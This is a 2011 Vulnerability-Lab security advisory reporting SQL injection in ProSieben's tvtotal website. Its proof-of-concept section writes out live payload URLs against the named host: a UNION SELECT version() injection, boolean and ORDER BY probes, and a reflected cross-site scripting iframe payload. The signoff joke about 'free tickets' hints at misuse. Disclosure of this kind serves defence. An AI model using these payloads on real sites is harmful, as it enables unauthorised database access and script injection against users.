Prosieben Web Services SQL Injection

`Title:  
======  
Prosieben Web Services - Multiple SQL Injection Vulnerabilities  
  
  
Date:  
=====  
2011-09-26  
  
  
  
VL-ID:  
=====  
284  
  
  
Abstract:  
=========  
The Vulnerability Lab Research Team discovered multiple remote SQL  
Injection vulnerabilities on prosiebens - tvtotal vendor website.  
  
  
Report-Timeline:  
================  
2011-09-01: Vendor Fix/Patch  
2011-10-04: Public or Non-Public Disclosure [FULL RELEASE]  
  
  
Status:  
========  
Unpublished  
  
  
Exploitation-Technique:  
=======================  
Remote  
  
  
Severity:  
=========  
Critical  
  
  
Details:  
========  
Multiple remote SQL Injection vulnerabilities are detected on Prosiebens  
Tvtotal vendor website.  
Remote attackers can inject/execute own sql statements over the  
vulnerable modules on the affected dbms.  
Successful exploitation can result in server & database management  
system compromise.  
  
Vulnerable Module(s):  
[+] Player - Index  
[+] Videos Listing  
[+] Community Profiles  
  
Vulnerable Param(s):  
[+] ?list=tag&tag=stefan_raab&tagId=  
[+] ?contentId=  
[+] ?u=  
  
Pictures:  
../1.png  
../2.png  
../  
  
  
Proof of Concept:  
=================  
The vulnerabilities can be exploited by remote attackers. For  
demonstration or reproduce ...  
  
1.1  
  
URL: http://tvtotal.prosieben.de  
PATH: /tvtotal/videos/player/  
File: index.html  
Para: ?contentId=  
  
http://tvtotal.prosieben.de/tvtotal/videos/player/index.html?contentId=-42136+union+select+1,2,3,4,5,6,  
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31,32,33,34,35,36--+  
  
1.2  
http://tvtotal.prosieben.de/tvtotal/suche/?query="><IFRAME  
SRC="javascript:alert('X4lt');"></IFRAME>&x=13&y=18  
  
  
2.1  
  
URL: http://tvtotal.prosieben.de  
PATH: /tvtotal/videos/  
File: index.html  
Para: ?list=tag&tag=stefan_raab&tagId='  
  
http://tvtotal.prosieben.de/tvtotal/videos/index.html?list=tag&tag=stefan_raab&tagId=18  
and 1=2--  
  
  
3.1  
  
URL: http://tvtotal.prosieben.de  
PATH: /tvtotal/community/forum/  
File: account.php  
Para: ?u=-1'  
  
http://tvtotal.prosieben.de/tvtotal/community/forum/account.php?u=-1  
order by 1--  
  
  
Risk:  
=====  
The security risk of the sql injection vulnerabilities are estimated as  
critical.  
  
  
Credits:  
========  
Vulnerability Research Laboratory  
  
  
Disclaimer:  
===========  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability-Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-  
Lab or its suppliers are not liable in any case of damage, including  
direct, indirect, incidental, consequential loss of business  
profits or special damages, even if Vulnerability-Lab or its suppliers  
have been advised of the possibility of such damages. Some  
states do not allow the exclusion or limitation of liability for  
consequential or incidental damages so the foregoing limitation  
may not apply. Any modified copy or reproduction, including partially  
usages, of this file requires authorization from Vulnerability-  
Lab. Permission to electronically redistribute this alert in its  
unmodified form is granted. All other rights, including the use of  
other media, are reserved by Vulnerability-Lab or its suppliers.  
  
Copyright © 2011|Vulnerability-Lab  
  
  
Comment: Thanks for the free tickets to tvtotal ;) by f0x  
  
--   
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com  
Contact: [email protected] or [email protected]  
  
  
`